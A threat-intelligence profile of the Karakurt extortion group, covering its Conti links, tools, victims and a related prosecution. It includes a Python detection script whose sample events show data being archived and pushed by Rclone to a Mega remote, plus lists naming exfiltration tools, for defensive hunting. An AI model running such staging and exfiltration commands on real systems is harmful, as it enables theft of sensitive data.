KaraKurt
Karakurt is a ransomware and data-extortion operation associated in the provided reporting with the broader Conti/TrickBot cybercrime ecosystem and, in multiple sources, with former Conti leaders or members. The activity was first spotted in June 2021 and publicly detailed by Accenture in December 2021, although prosecutors also described Karakurt as active since at least 2020. The group is repeatedly characterized as using extortion-only or encryption-less tactics centered on data theft and threats to leak stolen information, though some reporting and court material also refer to it as a ransomware operation. Karakurt has been linked in ransom-note branding and related reporting with other names used by the same broader organization, including Conti, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira.
High-confidence tradecraft described in the content includes initial access via stolen VPN credentials; use of Cobalt Strike, AnyDesk, Mimikatz, PowerShell, 7zip, WinZip, Rclone, FileZilla, and Mega.io; and exfiltration-driven extortion. A joint FBI/CISA/Treasury/FinCEN alert cited in the content states Karakurt typically gave victims one week to pay ransom demands ranging from $25,000 to $13 million in Bitcoin. The group has also been associated with re-extortion or follow-on extortion activity against prior ransomware victims.
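As an added illustration (not part of the original reporting), the following Python sketch hunts for the staging-then-exfiltration pattern named above: an archiver such as 7zip or WinZip run shortly before Rclone or FileZilla pushes data to a cloud or FTP remote. The process-creation events, hostnames, paths, remote names and the two-hour window are constructed assumptions.

```python
"""Flag the staging-then-exfiltration chain described in Karakurt reporting:
an archiver (7zip/WinZip) followed, on the same host within a short window,
by Rclone or FileZilla pushing data towards a cloud or FTP remote."""
from datetime import datetime, timedelta

# Constructed Sysmon-style process-creation events; hosts, paths and remotes are invented.
EVENTS = [
    {"ts": "2021-06-14T02:10:05", "host": "FS01", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a -p C:\Users\Public\dump.7z \\FS01\Finance"},
    {"ts": "2021-06-14T02:31:40", "host": "FS01", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Users\Public\dump.7z mega:backup --transfers 8"},
    {"ts": "2021-06-14T09:00:00", "host": "WS07", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a C:\build\release.7z C:\build\out"},
    {"ts": "2021-06-15T11:02:13", "host": "WS07", "image": r"C:\Users\dev\rclone.exe",
     "cmdline": r"rclone.exe sync C:\build\out gdrive:ci"},
]

ARCHIVERS = ("7z.exe", "7za.exe", "wzzip.exe", "winzip64.exe")  # assumed binary names
EXFIL_TOOLS = ("rclone.exe", "filezilla.exe")
# "mega" and "ftp" reflect the tooling named in the reporting; the rest are common backends.
REMOTE_HINTS = ("mega", "ftp", "sftp", "drive", "s3", "b2")
WINDOW = timedelta(hours=2)  # assumed staging-to-upload window; tune to your environment

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_archiver(ev):
    return basename(ev["image"]) in ARCHIVERS

def is_exfil(ev):
    cmd = ev["cmdline"].lower()
    return basename(ev["image"]) in EXFIL_TOOLS and any(h in cmd for h in REMOTE_HINTS)

def find_exfil_chains(events, window=WINDOW):
    """Return (host, archive_ts, exfil_ts, cmdline) for every exfil-tool run that
    follows an archiver run on the same host within `window`."""
    hits = []
    archives = {}  # host -> timestamps of archiver runs seen so far
    for ev in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(ev["ts"])
        if is_archiver(ev):
            archives.setdefault(ev["host"], []).append(t)
        elif is_exfil(ev):
            recent = [a for a in archives.get(ev["host"], []) if timedelta(0) <= t - a <= window]
            if recent:
                hits.append((ev["host"], recent[-1].isoformat(), ev["ts"], ev["cmdline"]))
    return hits

if __name__ == "__main__":
    for host, staged, pushed, cmd in find_exfil_chains(EVENTS):
        print(f"{host}: archived at {staged}, uploaded at {pushed}: {cmd}")
```

Only the FS01 pair fires; the WS07 build host also runs 7zip and Rclone, but more than a day apart, which is why the time window matters for keeping noise down.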
Victimology in the content indicates most known victims were in North America, with others in Europe. Reported victims included businesses, government entities, and healthcare organizations; one cited case, Ann & Robert H. Lurie Children’s Hospital of Chicago, involved confirmed data theft. Court reporting tied the broader organization using the Karakurt brand to attacks on more than 54 companies worldwide between June 2021 and August 2023, to exposure of sensitive data such as Social Security numbers, addresses, dates of birth, and healthcare records, and to one incident that forced a government entity’s 911 emergency system offline.
The content also links Karakurt to the prosecution of Deniss Zolotarjovs, a Latvian national described as a negotiator/extortionist for a Russian-linked ransomware organization that used the Karakurt brand among others. Prosecutors said he analyzed stolen data, researched victims, and used highly sensitive information, including pediatric health records, to intensify extortion. Additional ecosystem reporting in the content connects Karakurt to the TrickBot/Conti lineage, including statements that TrickBot partnered with groups deploying Karakurt and that wallets linked to Conti leader alias Stern transacted with addresses associated with Karakurt.
Vulnerabilities exploited
In one case, attempts to exploit CVE-2020-1472, also known as Zerologon, were detected by security software. The environment was not actually vulnerable to Zerologon, however, which indicates that Karakurt may attempt to exploit a number of vulnerabilities as part of its operation.
Groups observed using it
...Stern has transacted with addresses linked to strains like Quantum, Karakurt, Diavol, and Royal in 2022 following Conti’s demise.
Techniques & procedures
Exfiltration
During the time of Zolotarjovs’s active participation ... the organization stole data from over 54 companies ... Attacks during this period resulted in the theft and exposure of Social Security numbers, addresses, dates of birth, home addresses, healthcare information...
Impact
"Trickbot has ... partnered with ransomware groups to deploy several strains including Ryuk, Conti, Diavol, and Karakurt."
When he failed in extracting a ransom from this victim, he urged coconspirators to be “DESTROYERS” and to leak or sell copies of these pediatric health records to sow fear among future victims.
During the time of Zolotarjovs’s active participation ... the organization stole data from over 54 companies ... Zolotarjovs was primarily responsible for escalating pressure on victims who initially resisted prompt payment of the organization’s ransom demands. Zolotarjovs analyzed stolen data, researched victim companies, and exploited his access to particularly sensitive and extremely personal information.
Recent activity
A ransomware brand operated by the syndicate during the June 2021 to August 2023 period.
Karakurt is a cyber extortion/ransomware operation tied to former Conti members. It stole data from victim organizations, used that data for extortion, and in attacks leveraged VPN credentials for initial access, then tools such as Cobalt Strike, AnyDesk, Mimikatz, PowerShell, 7zip, WinZip, Rclone, and FileZilla to maintain access, escalate privileges, and exfiltrate data.
A name used by the extortion crew in ransom notes as part of its multi-brand ransomware and data-extortion operations.
Named as one of the brands or identities associated with a ransomware gang led by former Conti leaders and involved in data theft and extortion.